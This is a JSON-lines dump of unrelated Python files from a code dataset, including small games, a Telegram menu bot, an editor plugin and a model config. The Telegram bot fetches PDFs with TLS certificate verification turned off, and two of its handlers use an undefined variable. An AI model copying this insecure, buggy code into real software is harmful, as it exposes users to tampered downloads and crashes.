data_dic['i'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n \n Choice_dict['Player 2'] = user2[0]\n winner = check(data_dic['a'],data_dic['b'],data_dic['c'],data_dic['d'],data_dic['e'],data_dic['f']\n ,data_dic['g'],data_dic['h'],data_dic['i'])\n if (winner != \" \"):\n continuous_check = (True,winner)\n break\n\n\n counter += 1\n \n \n if f == 'a' or f == 'b':\n pass\n else:\n if (continuous_check[0] == True):\n key_list = list(Choice_dict.keys())\n value_list = list(Choice_dict.values())\n if (choices == 2):\n position1 = value_list.index('X')\n position2 = value_list.index(var) \n else:\n position1 = value_list.index('X')\n position2 = value_list.index('O') \n if (continuous_check[1] == f'{RED}X{RESET}'):\n if choices == 2:\n if (key_list[position1] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} Computer.\")\n else:\n if (key_list[position1] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name2}\")\n else:\n if choices == 2:\n if (key_list[position2] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} Computer.\")\n else:\n if (key_list[position2] == \"Player 1\"):\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name1}\")\n else:\n print(f\"{MAGENTA}Congratulations! Winner of the Game is{BOLD} {name2}\")\n \n else:\n pass\nif __name__ == '__main__':\n game()\ncolorama.deinit()\ntime.sleep(2.4) \n \n\"\"\" \nMy Approach is that I will create a dictionary and each time a column is filed I will pass the column name and the value given to that column\nin the dictionary and while giving input I will check if that column is already filled and also the checking will be done using the dictionary.\nAlso the Colors of each Variable and the Arrows pointing to the current input column is given, the Warning situation such as If entered a column \nalready filled then it will give warning and choice to re-enter and if Choosed a variable which is not the same as choosed in the beginning\nit will give a Warning and choice to re-enter, and all the Warnings and choice to re-enter are given untill the Choice is True with the given Conditions,\nas mentioned before.The Player who takes the winning variable, his name gets displayed at the end while declearing the winner, and this is acheived \nby storing the variable choosed by each user at the beginning and then calling the key of the dictionary from the value. \n\"\"\"\n \n\n\n\n","sub_path":"TIC TAC TOE Project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558363223","text":"from Tkinter import *\n\n\ndef quit():\n master.quit()\n\n\ndef instructions():\n global Instructions, Back_Button\n Instructions_Button.grid_remove()\n Play_Button.grid_remove()\n Quit_Button.grid_remove()\n Instructions = Label(master, wraplength=250, bg=\"#FFFFFF\",\n text=\"Use the arrow keys to move and rotate pieces, press space bar for quick drop. Try to for complete rows of blocks at the bottom (with no gaps). Each complete row will disappear, giving you more room to as you continue playing. 
Your game is over if the falling blocks pile up to the top of the playing area.\")\n Instructions.grid(row=1, column=0, padx=2, pady=20)\n Back_Button = Button(master, text=\"Back to Main Menu\", width=20, height=3, bg=\"#2196F3\", command=main_menu)\n Back_Button.grid(row=2, column=0, pady=25)\n\n\ndef main_menu():\n Instructions.grid_remove()\n Back_Button.grid_remove()\n Play_Button.grid()\n Instructions_Button.grid()\n Quit_Button.grid()\n\n\ndef play():\n master.destroy()\n execfile('Game.py', globals())\n\n\nmaster = Tk()\n\nmaster.configure(background=\"#FFFFFF\")\nw, h = 300, 400\nws = master.winfo_screenwidth() # width of the screen\nhs = master.winfo_screenheight() # height of the screen\n\nx = (ws / 4) - (w / 2)\ny = (hs / 2) - (h / 2)\n\nmaster.geometry('%dx%d+%d+%d' % (w, h, x, y))\n\ndisplayBarheight = 0.15 * h\nDisplayBar = Frame(master, bg=\"#2979ff\", height=displayBarheight, width=w).grid(row=0)\n\nTitle = Label(DisplayBar, text=\"Tetris!\", bg=\"#2979ff\", font=\"Verdana 18 bold\").grid(row=0, column=0)\n\nPlay_Button = Button(master, text=\"Play!\", width=20, height=3, bg=\"#2196F3\", command=play)\nInstructions_Button = Button(master, text=\"Instructions\", width=20, height=3, bg=\"#2196F3\", command=instructions)\nQuit_Button = Button(master, text=\"Quit\", width=20, height=3, bg=\"#2196F3\", command=quit)\nPlay_Button.grid(row=2, column=0, pady=25)\nInstructions_Button.grid(row=3, column=0, pady=25)\nQuit_Button.grid(row=4, column=0, pady=25)\n\nmaster.mainloop()\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"444821883","text":"# an example on how fetches work \n# To fetch the outputs of operations, execute the graph with a run() call on \n# the Session object and pass in the tensors to retrieve. \n# You can also fetch multiple tensors\nimport tensorflow as tf \n\ninput1 = tf.constant([3.0])\ninput2 = tf.constant([2.0])\ninput3 = tf.constant([5.0])\nintermed = tf.add(input2, input3)\nmul = tf.mul(input1, intermed)\n\nwith tf.Session() as sess:\n result = sess.run([mul, intermed])\n print(\"Result of fetches: {}\".format(result))\n","sub_path":"mnist_for_experts/tests/fetches.py","file_name":"fetches.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183559329","text":"#!/usr/bin/env python3\ntry:\n num = int(input(\"Input number : \"))\nexcept ValueError:\n print(\"ValueError! 
Number must be integer!\")\nelse:\n if num % 3 == 0 :\n print('That is wonderful!')\n else :\n raise NameError(\"The number must be divide by 3!\")\n","sub_path":"nvard/python/#5/division_3.py","file_name":"division_3.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"308161834","text":"#!/etc/whatsonthemenu_bot/whatsonthemenuenv/bin/python\n# -*- coding: utf-8 -*-\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom pdf2image import convert_from_path, convert_from_bytes\nimport logging\nimport requests\nimport shutil\nimport datetime\nimport os\nimport tempfile\n\n# Enable logging\nlogging.basicConfig(level=logging.INFO, filename='/etc/whatsonthemenu_bot/whatsonthemenuenv/whatsonthemenu.log', filemode='a',datefmt='%d.%m.%Y %H:%M:%S', format= '%(asctime)s - %(message)s')\n\nlogger = logging.getLogger(__name__)\n\n\n# Define a few command handlers. These usually take the two arguments bot and\n# update. Error handlers also receive the raised TelegramError object in error.\n\n\ndef start(bot, update):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n\n chatidstr = str(chat_id)\n func = 'start'\n\n logger.info(chatidstr + ' - ' + func)\n\n update.message.reply_text('Hi!')\n\n\ndef help(bot, update):\n \"\"\"Send a message when the command /help is issued.\"\"\"\n\n chatidstr = str(chat_id)\n func = 'help'\n\n logger.info(chatidstr + ' - ' + func)\n\n update.message.reply_text('Help!')\n\ndef menu_mdc(bot, update):\n \"\"\"Send the MDC Menu when command /menu_mdc is issued\"\"\"\n chat_id = update.message.chat_id\n\n dest = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/mdc.jpg'\n pdffile = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/Speiseplan.pdf'\n url = 'https://www.bbb-berlin.de/pdf/Speiseplan.pdf'\n res = requests.get(url,verify=False)\n open(pdffile, 'wb').write(res.content)\n\n images = convert_from_path(pdffile)\n\n chatidstr = str(chat_id)\n func = 'menu_mdc'\n\n logger.info(chatidstr + ' - ' + func)\n\n for image in images:\n image.save(dest,'JPEG')\n bot.send_photo(chat_id=chat_id, photo=open(dest,'rb'))\n\ndef menu_kantine(bot,update):\n \"\"\"Send the Kantinen Menu when the command /menu_kantine is issued\"\"\"\n chat_id = update.message.chat_id\n weeknumber = datetime.date.today().isocalendar()[1]\n year = str(datetime.date.today().year)\n\n if weeknumber < 10:\n weeknumber = '0'+str(weeknumber)\n\n pdffile = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/Speiseplan_Kantine.pdf'\n dest = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/kantine.jpg'\n\n # cleaning the pics\n os.remove(dest)\n #errorpic = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/menus_castle.jpg'\n urls = ['https://www.helios-gesundheit.de/fileadmin/UWS_Kliniken/Klinikum_Berlin-Buch/Ihr_Aufenthalt/Waehrend_des_Aufenthalts/Cafeteria/KW'+str(weeknumber)+'_'+year+'_HKBB_Speisenplan_Cafeteria.pdf','https://www.helios-gesundheit.de/fileadmin/UWS_Kliniken/Klinikum_Berlin-Buch/Ihr_Aufenthalt/Waehrend_des_Aufenthalts/Cafeteria/KW'+str(weeknumber)+'_'+year+'.pdf']\n\n chatidstr = str(chat_id)\n func = 'menu_kantine'\n\n logger.info(chatidstr + ' - ' + func)\n\n for url in urls:\n res = requests.get(url,verify=False)\n if res.status_code == 404:\n return\n else:\n open(pdffile, 'wb').write(res.content)\n\n images = convert_from_path(pdffile)\n\n for image in images:\n image.save(dest,'JPEG')\n bot.send_photo(chat_id=chat_id, photo=open(dest,'rb'))\n pass\n\n\ndef 
error(bot, update, error):\n    \"\"\"Log Errors caused by Updates.\"\"\"\n    logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\ndef main():\n    \"\"\"Start the bot.\"\"\"\n    # Create the EventHandler and pass it your bot's token.\n    updater = Updater(\"APIKEY\")\n\n    # Get the dispatcher to register handlers\n    dp = updater.dispatcher\n\n    # on different commands - answer in Telegram\n    dp.add_handler(CommandHandler(\"start\", start))\n    dp.add_handler(CommandHandler(\"help\", help))\n    dp.add_handler(CommandHandler(\"menu_mdc\", menu_mdc))\n    dp.add_handler(CommandHandler(\"menu_kantine\", menu_kantine))\n\n    # log all errors\n    dp.add_error_handler(error)\n\n    # Start the Bot\n    updater.start_polling()\n\n    # Run the bot until you press Ctrl-C or the process receives SIGINT,\n    # SIGTERM or SIGABRT. This should be used most of the time, since\n    # start_polling() is non-blocking and will stop the bot gracefully.\n    updater.idle()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"whatsonthemenubot.py","file_name":"whatsonthemenubot.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"557905987","text":"from abc import ABCMeta, abstractmethod\n\n\nclass Zoo(object):\n    def __init__(self, name):\n        self.name = name\n        self.animals = []\n\n    def add_animal(self, animal):\n        if animal not in self.animals:\n            setattr(self, animal.__class__.__name__, True)\n            self.animals.append(animal)\n        else:\n            raise Exception(\"duplicated animal\")\n\n\nclass Animal(metaclass=ABCMeta):\n    # def __init__(self):\n    #     raise Exception(\"Animal cls can't be initialized\")\n\n    kind = None  # diet type\n    size = None  # body size\n    character = None  # temperament\n    ferocity = None  # ferocious animal\n\n    @abstractmethod\n    def is_ferocious(self):\n        size_dict = {\"大\": 3, \"中等\": 2, \"小\": 1}\n        if self.kind == \"食肉\" and size_dict[self.size] >= 2 and self.character == \"凶猛\":\n            return True\n        return False\n\n\nclass Cat(Animal):\n    def __init__(self, name, kind, size, character):\n        self.name = name\n        self.kind = kind\n        self.size = size\n        self.character = character\n\n    voice = \"miaomiaomiao\"\n\n    @property\n    def is_pet(self):\n        return not self.is_ferocious\n\n    @property\n    def is_ferocious(self):\n        size_dict = {\"大\": 3, \"中等\": 2, \"小\": 1}\n        if self.kind == \"食肉\" and size_dict[self.size] >= 2 and self.character == \"凶猛\":\n            return True\n        return False\n\n\nclass Dog(Animal):\n    def __init__(self, name, kind, size, character):\n        self.name = name\n        self.kind = kind\n        self.size = size\n        self.character = character\n\n    voice = \"wangwangwang\"\n\n    @property\n    def is_pet(self):\n        return not self.is_ferocious\n\n    @property\n    def is_ferocious(self):\n        size_dict = {\"大\": 3, \"中等\": 2, \"小\": 1}\n        if self.kind == \"食肉\" and size_dict[self.size] >= 2 and self.character == \"凶猛\":\n            return True\n        return False\n\n\n# Start testing\nif __name__ == '__main__':\n    # Instantiate the zoo\n    z = Zoo('时间动物园')\n    # Instantiate a cat; attributes: name, kind, size, temperament\n    cat1 = Cat('大花猫 1', '食肉', '小', '温顺')\n    dog1 = Dog('大花狗 1', '食肉', '大', '凶猛')\n    # Add a cat to the zoo\n    z.add_animal(cat1)\n    # Does the zoo have this kind of animal?\n    have_cat = hasattr(z, 'Cat')\n    have_dog = hasattr(z, 'Dog')\n    print(f\"有猫吗?{have_cat}\")\n    print(f\"有狗吗?{have_dog}\")\n    print(f\"猫是宠物吗?{cat1.is_pet}\")\n    print(f\"狗凶猛吗?{dog1.is_ferocious}\")\n    # a = Animal()  # Exception raised\n","sub_path":"week07/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416513307","text":"# boj 3003 King, 
Queen, Rook, Bishop, Knight, Pawn b5\n# noj.am/3003\n\n# fastest-runtime pypy3 solution\nchess = list(map(int, input().split()))\n_list = [1, 1, 2, 2, 2, 8]\nans = []\nfor i in range(len(_list) - 1, -1, -1):\n    ans.append(_list[i] - chess.pop())\nprint(*reversed(ans))\n","sub_path":"Yeongseop-Song/baekjoon/3003.py","file_name":"3003.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"201069695","text":"\"\"\"Compile, run and lint files.\"\"\"\n\nimport dataclasses\nimport logging\nimport os\nimport pathlib\nimport shlex\nimport sys\nfrom functools import partial\nfrom typing import List, Optional\n\nif sys.version_info >= (3, 8):\n    from typing import Literal\nelse:\n    from typing_extensions import Literal\n\nfrom porcupine import get_tab_manager, menubar, tabs\n\nfrom . import no_terminal, terminal\n\nlog = logging.getLogger(__name__)\n\n\n@dataclasses.dataclass\nclass CommandsConfig:\n    compile: str = ''\n    run: str = ''\n    lint: str = ''\n\n\ndef get_command(\n    tab: tabs.FileTab,\n    which_command: Literal['compile', 'run', 'lint'],\n    basename: str,\n) -> Optional[List[str]]:\n    assert os.sep not in basename, f\"{basename!r} is not a basename\"\n\n    commands = tab.settings.get('commands', CommandsConfig)\n    assert isinstance(commands, CommandsConfig)\n    template = getattr(commands, which_command)\n    if not template.strip():\n        return None\n\n    exts = ''.join(pathlib.Path(basename).suffixes)\n    no_ext = pathlib.Path(basename).stem\n    format_args = {\n        'file': basename,\n        'no_ext': no_ext,\n        'no_exts': basename[:-len(exts)] if exts else basename,\n        'python': 'py' if sys.platform == 'win32' else 'python3',\n        'exe': f'{no_ext}.exe' if sys.platform == 'win32' else f'./{no_ext}',\n    }\n    # TODO: is this really supposed to be shlex.split even on windows?\n    result = [part.format(**format_args) for part in shlex.split(template)]\n    return result\n\n\ndef do_something(something: Literal['compile', 'run', 'compilerun', 'lint']) -> None:\n    tab = get_tab_manager().select()\n    assert isinstance(tab, tabs.FileTab)\n\n    tab.save()\n    if tab.path is None:\n        # user cancelled a save as dialog\n        return\n\n    workingdir = tab.path.parent\n    basename = tab.path.name\n\n    if something == 'run':\n        command = get_command(tab, 'run', basename)\n        if command is not None:\n            terminal.run_command(workingdir, command)\n\n    elif something == 'compilerun':\n        def run_after_compile() -> None:\n            assert isinstance(tab, tabs.FileTab)\n            command = get_command(tab, 'run', basename)\n            if command is not None:\n                terminal.run_command(workingdir, command)\n\n        compile_command = get_command(tab, 'compile', basename)\n        if compile_command is not None:\n            no_terminal.run_command(workingdir, compile_command, run_after_compile)\n\n    else:\n        command = get_command(tab, something, basename)\n        if command is not None:\n            no_terminal.run_command(workingdir, command)\n\n\ndef on_new_tab(tab: tabs.Tab) -> None:\n    if isinstance(tab, tabs.FileTab):\n        tab.settings.add_option('commands', CommandsConfig())\n\n\ndef setup() -> None:\n    get_tab_manager().add_tab_callback(on_new_tab)\n\n    menubar.get_menu(\"Run\").add_command(label=\"Compile\", command=partial(do_something, 'compile'))\n    menubar.get_menu(\"Run\").add_command(label=\"Run\", command=partial(do_something, 'run'))\n    menubar.get_menu(\"Run\").add_command(label=\"Compile and Run\", command=partial(do_something, 'compilerun'))\n    menubar.get_menu(\"Run\").add_command(label=\"Lint\", command=partial(do_something, 'lint'))\n\n    # TODO: disable the menu items when 
they don't correspond to actual commands\n for label in {\"Compile\", \"Run\", \"Compile and Run\", \"Lint\"}:\n menubar.set_enabled_based_on_tab(f\"Run/{label}\", (lambda tab: isinstance(tab, tabs.FileTab)))\n","sub_path":"porcupine/plugins/run/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"441525692","text":"import os\n\n\nclass clickMeConfig(object):\n def __init__(self, **kwargs):\n # Image directories\n self.clicktionary_dir = '/media/data_cifs/clicktionary/'\n self.image_base_path = os.path.join(\n self.clicktionary_dir, 'webapp_data')\n\n self.training_images = os.path.join(\n self.image_base_path, 'lmdb_trains')\n\n self.tf_train_name = 'clicks_only_train_7.tfrecords'\n # self.tf_train_name = 'full_imagenet_with_some_clicks_train_7.tfrecords'\n\n self.validation_images = os.path.join(\n self.image_base_path, 'lmdb_validations')\n # self.tf_val_name = 'imagenet_val.tfrecords'\n self.encode_clicktionary = True\n self.tf_val_name = 'clicktionary.tfrecords'\n\n self.clicktionary_validation_images = os.path.join(\n self.image_base_path, 'clickme_val_clicktionary')\n self.coco_validation_images = os.path.join(\n self.image_base_path, 'coco_overlap_lmdb_validations')\n self.coco_tf_val_name = 'coco_val.tfrecords'\n self.im_ext = '.JPEG'\n\n # Project file directories\n self.project_base_path = '/media/data_cifs/clicktionary/clickme_experiment'\n # self.project_base_path = '/home/drew/clickme/'\n # self.project_base_path = '/media/cifs_all/charlie/clickme/' \n self.tf_record_base = os.path.join(\n self.project_base_path, 'tf_records')\n # '/home/drew/clickme_tf_records/')\n self.results = os.path.join(self.project_base_path, 'results')\n self.train_checkpoint = os.path.join(\n self.project_base_path, 'attgrad_vgg_checkpoints')\n self.train_summaries = os.path.join(\n self.project_base_path, 'attgrad_vgg_summaries')\n\n\n # Image settings\n self.image_size = [256, 256, 3]\n self.click_box_radius = 7 # For human clickme observers: 7; for CNNs observers: 20\n self.viz_images = [\n '163_0.JPEG', '23_0.JPEG', '31_0.JPEG',\n '403_0.JPEG', '671_0.JPEG', '818_0.JPEG', '838_0.JPEG',\n '209_0.JPEG', '23_1.JPEG', '339_0.JPEG', '404_0.JPEG',\n '815_0.JPEG', '834_0.JPEG', '838_1.JPEG', '209_1.JPEG',\n '308_0.JPEG', '340_0.JPEG', '471_48043.JPEG', '817_0.JPEG',\n '837_0.JPEG', '838_2.JPEG']\n self.viz_images = [os.path.join(\n self.project_base_path, 'test_images', x) for x in self.viz_images]\n self.hm_scoring = 'uniform' # linear_decrease/uniform/linear_increase\n self.investigate_subjects = ['r1Ieyvtax', 'B1x-611pl', 'HkJm9Skwx', 'BJEVHkW6l', 'B1qskZbOg', 'By1TONCsg'] # relive_this@live.com ; ['rykyZPzTl'], freemoneyq ['rJkI8aOox'], # 'BklslAOgb', HJy2nW9k 'r1Ieyvtax', 'B1x-611pl'\n self.consolidation_type = 'both' # clicks, consolidated, or both\n self.click_syn_file = os.path.join(self.clicktionary_dir, 'clicktionary_image_categories.txt')\n with open(self.click_syn_file) as f:\n content = f.readlines()\n self.heatmap_image_dict = {\n v.split(' ')[0]: int(\n v.split(' ')[1].strip('\\n')) for v in content}\n\n # Model settings\n self.vgg16_weight_path = os.path.join(\n self.clicktionary_dir, 'pretrained_weights', 'vgg16.npy')\n self.train_batch = 32\n self.validation_batch = 20\n\n # validation_batch * num_validation_evals is num of val images to test\n self.num_validation_evals = 10\n self.validation_iters = 500 # test validation every this # of steps\n 
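        # Worked example from the defaults above (added as an explanatory comment):\n        # with validation_batch = 20 and num_validation_evals = 10, each validation\n        # pass scores 20 * 10 = 200 images, and it runs every validation_iters = 500\n        # training steps.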
self.epochs = 200 # Increase since we are augmenting\n self.top_n_validation = 0 # set to 0 to save all\n self.model_image_size = [224, 224, 3]\n self.output_shape = 1000 # how many categories for classification\n # choose from ['conv5_1', 'fc6', 'conv5_3', 'fc7', 'fc8', 'conv5_2',\n # 'conv4_1', 'conv4_2', 'conv4_3', 'conv3_3', 'conv3_2',\n # 'conv3_1', 'conv1_1', 'conv1_2', 'conv2_2', 'conv2_1']\n self.fine_tune_layers = ['fc6', 'fc7', 'fc8']\n self.initialize_layers = ['fc6', 'fc7', 'fc8'] # must be in fine_tune_layers\n self.wd_layers = ['fc6', 'fc7', 'fc8']\n self.batchnorm_layers = ['fc6', 'fc7', 'fc8'] # ['fc6', 'fc7', 'fc8'] # ['fc6', 'fc7', 'fc8'] # ['fc6', 'fc7', 'fc8']\n self.optimizer = 'adam' # 'adam' 'sgd'\n self.hold_lr = 1e-8 # 1e-8\n self.new_lr = 3e-4 # 1e-6\n self.keep_checkpoints = 60 # max # of checkpoints\n self.grad_clip = False\n self.weight_loss_with_counts = True\n self.reweighting = 'uniform' # if above is true, 'uniform' or 'counts'\n\n # Attention settings\n self.attention_layers = ['fc8'] # [\n # self.attention_layers = ['conv1_2', 'conv2_1', 'conv3_1',\n # 'conv4_1', 'conv5_1'] # [\n # 'conv1_2', 'conv2_2', 'conv3_3', 'conv4_3', 'conv5_3']\n self.attention_type = 'activation' # 'gradient', 'activation', 'lrp'\n self.combine_type = 'sum_abs' # 'pass' 'sum_abs' 'sum_p' 'max_p'\n self.plot_gradients = True\n self.loss_function = 'l2' # 'l2' or 'huber' 'log_loss' 'masked_l2'\n self.attention_loss = 'l2'\n self.normalize = 'l2' # 'l2 or z or 'softmax' or sigmoid or none\n self.reg_penalty = 0.1 # 0.001 # 0.01 #0.05 # 0.01\n self.wd_penalty = None # 5e-5\n self.loss_type = 'joint' # 'joint'\n self.targeted_gradient = True # True # Requires attention_layers = ['fc8']\n self.heatmap_blur_maps = 49 # 0 = no, > 0 blur kernel\n self.gradient_blur_maps = 49 # 30 # 0 = no, > 0 blur kernel\n\n # choose from: random_crop\n self.data_augmentations = [\n 'random_crop',\n 'left_right',\n 'random_contrast', # 'random_brightness'\n ]\n\n ######\n # Visualization settings\n ######\n\n # Directory with images for heatmaps\n self.heatmap_dataset_images = os.path.join(\n '/home/andreas/charlie', 'images_for_heatmaps')\n self.restore_model = None # '/media/data_cifs/clicktionary/clickme_experiment/checkpoints/gradient_001_112341_2017_05_16_16_20_26/model_18000.ckpt-18000'\n self.heatmap_image_labels = '/home/andreas/charlie/MIRC_behavior/exp_3_all_images_no_mircs'\n\n # Images for visualization parameters\n # > 0 = number of images, < 0 = proportion of images\n self.heatmap_image_amount = 1000\n self.heatmap_batch = 1\n\n # Bubbles parameters\n self.visualization_output = '/home/andreas/charlie/MIRC_behavior/click_comparisons/heatmaps_for_paper/clickme_bubbles_exp_3_baseline'\n self.generate_plots = True\n self.use_true_label = True\n self.block_size = 14\n self.block_stride = 1\n self.log_gradients = False # Whether to log the gradients and weights as we train the network\n\n # update attributes\n self.__dict__.update(kwargs)\n\n\nclass InceptionConfig(clickMeConfig):\n '''\n This config inherits from the above config, and deals with Inception V3 model details. 
All other\n    stuff (data paths, attention gradient combination/loss parameters,\n    optimizer stuff, etc) is handled by `clickMeConfig` up there (and inherited by this config)\n    '''\n    def __init__(self, **kwargs):\n        # Instantiate the parent class variables\n        super(InceptionConfig, self).__init__(**kwargs)\n        from ops.map_loss import MapLoss\n        # Don't restore vars in these scopes from the checkpoint\n        self.exclude_scopes = ['InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Logits', 'InceptionV3/AuxLogits']\n        # Only finetune layers in these scopes\n        self.trainable_scopes = ['InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Logits']  # 'InceptionV3/AuxLogits'\n        # Load model from here\n        # self.pretrained_ckpt = '/media/data_cifs/clickme/baseline_inception_checkpoints/inception_v3.ckpt'\n        self.pretrained_ckpt = os.path.join(self.project_base_path,\n            'baseline_inception_checkpoints/inception_v3.ckpt')\n\n        # For training\n        self.dropout_keep_prob = 0.8\n        self.weight_decay = 0.00004\n        self.stddev = 0.1\n        # Global weight for clickmap loss\n        self.beta = 1\n        # Used to compute the per-clickmap weight\n        self.max_clicks = 200\n        # Target attention loss to neuron for class\n        self.targeted = True\n        self.loss_type = MapLoss.PEARSON\n\n        self.__dict__.update(kwargs)\n\n\nclass DeepGazeConfig(clickMeConfig):\n    '''\n    This config only deals with Deep Gaze II model details. All other\n    stuff (data paths, attention gradient combination/loss parameters,\n    optimizer stuff, etc) is handled by `clickMeConfig` up there.\n    '''\n    def __init__(self, **kwargs):\n        # Instantiate the parent class variables (needed for image_base_path below)\n        super(DeepGazeConfig, self).__init__(**kwargs)\n        # Load model from here\n        self.pretrained_vgg19_ckpt = '/media/cifs_all/charlie/clickme/deepgaze_ii_checkpoints/vgg_19.ckpt'\n\n        # This directory should have a bunch of .JPEGs and .npys (n of each)\n        self.raw_validation_dir = '/media/cifs_all/charlie/clickme/raw_validation_data/'\n\n\n        self.new_lr = 1e-5 # 1e-6\n\n        self.training_images = os.path.join(\n            self.image_base_path, 'lmdb_trains')\n\n        ######## TODO: REMOVE THIS ######\n        self.num_validation_evals = 100\n        self.tf_train_name = 'full_imagenet_with_some_clicks_train_7.tfrecords'\n        ######## TODO: REMOVE THIS ######\n        self.__dict__.update(kwargs)\n\n\nclass Fcn8Config(clickMeConfig):\n    '''\n    This config inherits from the above config, and deals with FCN8 model details. 
All other\n stuff (data paths, attention gradient combination/loss parameters,\n optimizer stuff, etc) is handled by `clickMeConfig` up there (and inherited by this config)\n '''\n def __init__(self, **kwargs):\n super(Fcn8Config, self).__init__(**kwargs) # Instantiate the parent class variables\n\n\n\n self.validation_images_clicks_only = os.path.join(\n self.image_base_path, 'clicktionary_exp_123_images_256')\n self.validation_heatmaps_clicks_only = os.path.join(\n self.image_base_path, 'clicktionary_exp_123_heatmaps_256')\n\n\n self.train_batch_heatmap_prediction = 32\n self.validation_batch_heatmap_prediction = 32\n self.validation_iters = 200 # test validation every this # of steps\n self.tf_train_name_clicks_only = 'clicks_only_train_7.tfrecords'\n self.tf_val_name_clicks_only = 'clicks_only_val_7.tfrecords'\n\n\n\n\n self.num_validation_evals = 10\n self.wd_penalty = 5e-7 # 5e-5\n self.heatmap_blur_maps = 60 # 0 = no, > 0 blur kernel\n self.heatmap_prediction_loss_function = \"log_loss\"\n\n\n self.pretrained_ckpt = \"/media/data_cifs/clicktionary/clickme_experiment/fcn8_checkpoints/fcn8_baseline.ckpt\"\n\n self.train_checkpoint = os.path.join(\n self.project_base_path, 'fcn8_checkpoints')\n\n\n\n\n # self.fcn8_restore_strategy = \"restore_conv_hold_conv\" \n #self.fcn8_restore_strategy = \"restore_conv_fcn_hold_nothing\" \n #self.fcn8_restore_strategy = \"restore_conv_fcn_hold_conv_fcn\" \n self.fcn8_restore_strategy = \"restore_conv_fcn_hold_conv\" \n\n\n\n\n self.fcn8_weight_path = \"/media/data_cifs/fcn8_inits/fcn8_pascal_lite.npy\"\n\n\n\n\n def determine_var_restoration(self):\n convs = [\"cnn/conv1_1/filter\", \"cnn/conv1_1/biases\", \"cnn/conv1_2/filter\", \"cnn/conv1_2/biases\", \n \"cnn/conv2_1/filter\", \"cnn/conv2_1/biases\", \"cnn/conv2_2/filter\", \"cnn/conv2_2/biases\",\n \"cnn/conv3_1/filter\", \"cnn/conv3_1/biases\", \"cnn/conv3_2/filter\", \"cnn/conv3_2/biases\", \n \"cnn/conv3_3/filter\", \"cnn/conv3_3/biases\",\"cnn/conv4_1/filter\", \"cnn/conv4_1/biases\", \n \"cnn/conv4_2/filter\", \"cnn/conv4_2/biases\", \"cnn/conv4_3/filter\", \"cnn/conv4_3/biases\",\n \"cnn/conv5_1/filter\", \"cnn/conv5_1/biases\", \"cnn/conv5_2/filter\", \"cnn/conv5_2/biases\",\n \"cnn/conv5_3/filter\", \"cnn/conv5_3/biases\"]\n fcns = [\"cnn/fc6/weights\", \"cnn/fc6/biases\", \"cnn/fc7/weights\", \"cnn/fc7/biases\"]\n\n if self.fcn8_restore_strategy == \"scratch\":\n # Train the network from scratch\n self.restore_and_hold_vars = []\n self.restore_and_dont_hold_vars = []\n\n elif self.fcn8_restore_strategy == \"restore_conv_fcn_hold_nothing\":\n # Restore the conv and fcn variables and hold nothing\n self.restore_and_hold_vars = []\n self.restore_and_dont_hold_vars = convs + fcns\n\n elif self.fcn8_restore_strategy == \"restore_conv_hold_conv\":\n # Restore the conv and variables and hold only the conv variables\n self.restore_and_hold_vars = convs\n self.restore_and_dont_hold_vars = []\n\n elif self.fcn8_restore_strategy == \"restore_conv_fcn_hold_conv\":\n # Restore the conv and fcn variables and hold the conv\n self.restore_and_hold_vars = convs\n self.restore_and_dont_hold_vars = fcns\n\n elif self.fcn8_restore_strategy == \"restore_conv_fcn_hold_conv_fcn\":\n # Restore the conv and fcn variables and hold the conv and fcn variables\n self.restore_and_hold_vars = convs + fcns\n self.restore_and_dont_hold_vars = []\n else:\n assert False, 
